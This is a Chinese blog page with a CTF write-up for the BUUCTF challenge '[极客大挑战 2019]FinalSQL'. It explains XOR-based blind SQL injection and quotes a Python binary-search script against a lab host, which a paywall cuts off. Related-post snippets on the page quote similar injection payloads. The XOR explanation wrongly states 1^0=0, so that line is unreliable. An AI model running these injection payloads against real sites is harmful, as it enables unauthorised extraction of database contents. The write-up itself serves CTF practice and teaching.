[极客大挑战 2019]FinalSQL

最新推荐文章于 2024-03-16 07:00:00 发布
最新推荐文章于 2024-03-16 07:00:00 发布
阅读量172 收藏
点赞数
分类专栏: CTF 文章标签: sql 数据库 database
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qi_SJQ_/article/details/121023647
版权

CTF-Web-[极客大挑战 2019]FinalSQL

本来以为是登录框注入,看别人写的writeup才发现是那几个点击按钮的数字注入。根据提示知道是盲注。

异或'^'是一种数学运算,1^1=0 0^0=0 1^0=0,可以用来进行sql注入。
当两条件相同时(同真同假)结果为假,当两条件不同时(一真一假)结果为真。

从大佬那拿的exp:(较冗余,但更易理解)

import requests
import time

host = "http://d7fe6340-f773-4d67-8be9-aefb87c7a26c.node4.buuoj.cn:81/search.php?"

def getDatabase():  #获取数据库名
    global host
    ans=''
    for i in range(1,1000):
        low = 32
        high = 128
        mid = (low+high)//2
        while low < high:
            url = host + "id=1^(ascii(substr((select(database())),%d,1))<%d)^1" % (i,mid)
            res = requests.get(url)
            if "others~~~" in res.text:
                high = mid
            else:
                low = mid+1
            mid=(low+high)//2
        if mid <= 32 or mid >= 127:
            break
        ans += chr(mid-1
最低0.47元/天 解锁文章
暮w光
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云IoT极客创新挑战赛.pdf
08-29
高级设计专家 望海 在2018云栖大会·上海峰会中做了题为《阿里云 IoT 极客创新挑战赛》的分享,就极客挑战赛创意来源、赛事的技术平台、赛事进程等方面的内容做了深入的分析。
final关键字
huanglu12138的博客
03-25 163
在Java中final被称为是“终结器”。为什么叫“终结器”呢?我们通过下文final的性质及用法就能了解它取这个外号的原因。 一、修饰类、方法,属性 1.final可以修饰类、方法、属性 。 (1)使用final定义的方法不能被子类所覆写 2.final成员变量必须在声明的时候初始化或者在构造器中初始化,否则就会报编译错误 (1)使用final定义的变量就成为了常量,常量必须在声明时赋值,并且不能够被修...
Final 关键字详解。
勿忘初心的博客
05-05 205
Final 关键字的简单使用 1、 被final关键字 修饰的类不可以被子类继承。 2、 被final关键字修饰的方法,无法被子类重写。 3、 被final关键字修饰的基本变量,值不可以被改变, 4、被修饰的引用变量,不能修改地址值,但是可以对指向对象的内部进行修改。 eg: 代码很简单,看不懂只是你没用心看。 被final关键字 修饰的类不可以被子类继承。 被final关键字修饰的方法,无法...
[极客挑战 2019]FinalSQL wp
{OvEr}的博客
11-19 408
[极客挑战 2019]FinalSQL wp 终极sql注入了,考点是盲注(写脚本的那种இ௰இ) 打开网页是这样的。 那个红色的卡片,我们随便点进去看看,直接点最后一个吧。 通过url判断注入点是id。 接着做FUZZ测试,发现同样过滤了union、or、and、||、&等我们常用的关键字,但是没有过滤异或符号^。 当我们输入id=1^1时,回显"Error" 当我们输入id=1^0时,回显正常 接下来我们进行盲注,下面是大神的脚本 step 1爆数据库 import requests u
2019年三诺集团四周年庆典极客摇滚跑活动方案.pptx
05-06
2019年三诺集团四周年庆典极客摇滚跑活动方案
天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
01-28
【资源说明】 1、该资源包括项目的全部源码,下载可以直接使用! 2、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,...天池Apache Flink极客挑战赛-垃圾图片分类算法源码+项目说明.zip
极客学院JAVA视频教程 新版 7大部分
08-08
Java语言视频教程 极客学院JAVA视频教程 新版 7大部分
ISCC2019个人挑战赛题目练习
05-05
为了让大家能够拿到题目练习,增强网络安全技术和大赛经验的积累,可以下载这些题目来练习。解题思路在我的博客。
BUUCTF [极客挑战 2019]FinalSQL
qq_60829702的博客
10-21 1277
因为之前的几道盲注题目我都是直接看师傅的wp拿来用的,现在自己写一下发现果然光看不如去写。只有自己真正的去写了脚本才会发现一些东西永远都是看起来简单的一批,但是真正的让自己独立写出来还是有点难度的。毕竟那是别人的东西不是自己的东西,我们要把其他师傅的知识变成我们自己的。本人菜鸟一枚,虽然花了挺多时间写这个题目和wp的,但是收获到了很多东西,也希望我能坚持下来。
BUUCTF-[极客挑战 2019]FinalSQL
weixin_44016181的博客
09-15 322
除了普通的注入流程,报错注入,时间注入外,这题涉及了布尔注入当中的异或注入,根据回显的状态信息来获取数据库的相关信息。这样即便是我们不能直接调用和查看数据库,也能通过这种特别的注入方式得到flag。
sql注入 [极客挑战 2019]FinalSQL1
m0_75178803的博客
02-23 863
逻辑符号|会被检测到,而&感觉成了注释符,&之后的内容都被替换掉了。直接盲注比较慢,还需要利用二分法来编写脚本。这里直接令传入的id=6。传入id=1^1^1。这里利用到大佬的脚本。运行一下得到flag。
SQL注入之——[极客挑战 2019]FinalSQL
qq_35015835的博客
11-22 481
[极客挑战 2019]FinalSQL 界面和之前发生一些变化。 采用和上一题一样的方式,判断在输入框中主要过滤了一些什么内容。 从结果中可以看出,在上一题的基础上又增加了一些符号的过滤,如上图彩色部分举例显示,这样造成的结果是,输入框部分不能进行一系列的注入操作,因为关键的字符全部都被过滤。 那么转向这个页面中和上一题不同的地方,就是那几个紫色的方块。 点击之后发现,在URL中有了参数值,那么这样初步将注入目标锁定在GET参数中。 对get字段是否过滤了字段进行检测。 上图中显示的蓝色部分就是被过
[极客挑战 2019]FinalSQL 1
plant1234的博客
04-30 1880
[极客挑战 2019]FinalSQL 1 首先打开题目,发现是一个sql注入: 寻找注入点发现注入点在: 发现是一个盲注,且过滤了and和空格等 并且直接盲注比较慢,还需要利用二分法来编写脚本 大佬脚本: import requests url = "http://b4d7330a-4880-41c4-a20c-3dae55d11c37.node4.buuoj.cn:81/search.php" flag = '' def payload(i, j): sql = "1^(ord(
[极客挑战 2019]FinalSQL - 异或盲注
oZuoShen123的博客
10-05 463
1、这题的关键是找注入点,如果选择用户名、密码作为输入点就麻烦了 2、注入点:按钮,点击就传id;当id=1时,提示Click others   可以利用id的特性,构造异或匹配   payload: f"1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{j},1))={i})^1"   payload有两个异或:1^表达式^1
[极客挑战 2019]FinalSQL ---不会编程的崽
最新发布
不会编程的崽的博客
03-16 644
sql盲注
极客挑战 2019]EasySQL
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值